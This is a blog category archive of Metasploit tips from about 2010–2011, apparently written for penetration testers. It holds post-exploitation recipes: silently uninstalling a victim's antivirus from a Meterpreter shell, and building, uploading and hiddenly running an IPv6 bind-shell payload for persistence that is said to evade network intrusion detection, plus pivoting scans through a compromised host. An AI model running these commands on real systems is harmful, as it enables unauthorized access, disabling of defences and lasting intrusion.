Category Archives: Metasploit

Fixing Stale Cache on Metasploit for Mac OSX

0
Posted by Skyler on January 8, 2011 – 10:38 am
Filed under Fu (a.k.a Tips), Metasploit

So I just finished installing Metasploit on my Mac (official tutorial here)

After the typical ‘svn update’, msfconsole only showed partial exploits installed (263 to be exact). Well, knowing that metasploit currently has 600+ i knew something was wrong.

Thanks to HD Moore, i was able to fix it with this simple command:

rm -f ~/.msf3/modcache

Remotely Removing Anti-Virus

0
Posted by Skyler on December 21, 2010 – 6:26 am
Filed under Fu (a.k.a Tips), Metasploit

These are the command outlines given by Rob Fuller (mubix) on his blog, room362

Although there are many ways to disable anti-virus on a remote machine (including the metasploit killav script), actually removing the AV is just as simple. Here are the steps (click the above link for full video):

  1. Get Meterpreter shell
  2. edit the metasploit get_application_list script:
    1. add “GUID” to the ‘Columns’ associate array
    2. Modify the new thread creation to read:
      3. "tbl<<[dispnm, dispversion, k]"
  3. run get_application_list script
  4. find the GUID of the AV (should look like: { bla bla bla bla } )
  5. drop into a cmd shell run: 
    6. msiexec /norestart /q /x {GUID} REMOVE=all
  6. give it some time, and then voila!

Persistence In IPv6 (Notes)

0
Posted by Skyler on November 9, 2010 – 6:00 am
Filed under Basics, Fu (a.k.a Tips), Metasploit

Here are some command notes I made from the Hak5 Episode for Mubix. He was demonstrating remote access persistence via IPv6. This also has been demonstrated to bypass NIDS/NIPS if they are improperly configured.

You can view the episode here!

Install IPv6:

netsh int ipv6 install

Enable Teredo:

netsh int ipv6 set teredo enterpriseclient

Verify Teredo and IPv6 are working correctly (check for “Qualified”):

netsh int ipv6 show teredo

Copy down the targets IPv6 Address:

ipconfig /all

Create Bindshell:

./msfpayload windows/meterpreter/bind_ipv6_tcp LPORT=[port] X > bindshell.exe

Upload and execute payload via meterpreter:

upload bindshell.exe
execute -H -c -f bindshell.exe

To Reconnect [From Metasploit]:

Set PAYLOAD windows/meterpreter/bind_ipv6_tcp
Set RHOST=[ipv6 address you got earlier]
set LPORT=[port its bound to]
exploit





				
				
			



			

				
Metasploit gets SCADA


				                
0

                 

				

				

					Posted by Skyler on November 5, 2010 – 8:13 am
				

				

					Filed under Fu (a.k.a Tips), Metasploit, News
									
				
				


Im a little behind the curve on this one, but im sure not everyone has heard the news yet. Yesterday the media lit up about the latest addition to the Metasploit Framework: SCADA exploits.




SCADA?


SCADA stands for Supervisory Control and Data Acquisition. It is the system used to manage our infrastructure operations. So when you think about “leet haxors” taking over the power grip or water works, this is what they would be attacking. Currently there are ~16 exploits for SCADA, but with the release of exploits on Metasploit, we will see a major increase in the discovery and use of SCADA attacks.


Read more here:


Everybody Panic…


…Dawn of a New Era



				
				
			



			

				
Nessus Scanning Via Meterpreter


				                
0

                 

				

				

					Posted by Skyler on October 25, 2010 – 8:41 am
				

				

					Filed under Fu (a.k.a Tips), Metasploit, Research
									
				
				


This is beautiful! I have wondered for a long time about how to preform scans on a remote network via a compromised machine using meterpreter. DigiNinja (with some help  from Mark Baggett, and Egypt) has finally showed us how. (Btw, this is a great reason for everyone to join some good mailing lists. This was the result of a discussion on the Metasploit list.)


Why is this a big deal? Well, the ease of use and simplicity of metasploit/meterpreter is a big enough reason itself. However, the fact that the entire scan would pivot via a machine without ever touching anything besides memory is another huge benefit.


Although the tutorial is meant for Nessus, id imagine the same technique would work for Nmap and other scans ran through metasploit.


Take a look at it and enjoy!


Nessus Through Socks Through Meterpreter


EDIT:


Here is a link to Mark Baggett’s original blog post (on PaulDotCom) about using Proxychains and SSH to do the same thing:


SSH gymnastics with Proxychains



				
				
			



			

		

		
	        

	



	

	





Bad Behavior has blocked 275 access attempts in the last 7 days.